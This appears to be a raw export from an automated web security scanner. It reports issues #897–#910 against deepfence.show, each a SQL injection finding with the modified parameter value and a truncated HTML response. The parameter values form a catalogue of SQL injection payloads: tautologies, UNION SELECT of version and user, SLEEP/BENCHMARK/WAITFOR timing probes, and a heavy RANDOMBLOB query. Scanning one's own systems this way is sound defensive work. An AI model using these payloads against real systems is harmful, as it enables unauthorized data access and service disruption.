href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #897\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #898\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1=1 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #899Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #900\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \"));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #901\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #902\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #903\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1/0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #904\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' and 1=2 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #905\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ')) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #906\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #907\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #908\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1 or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #909\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #910Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 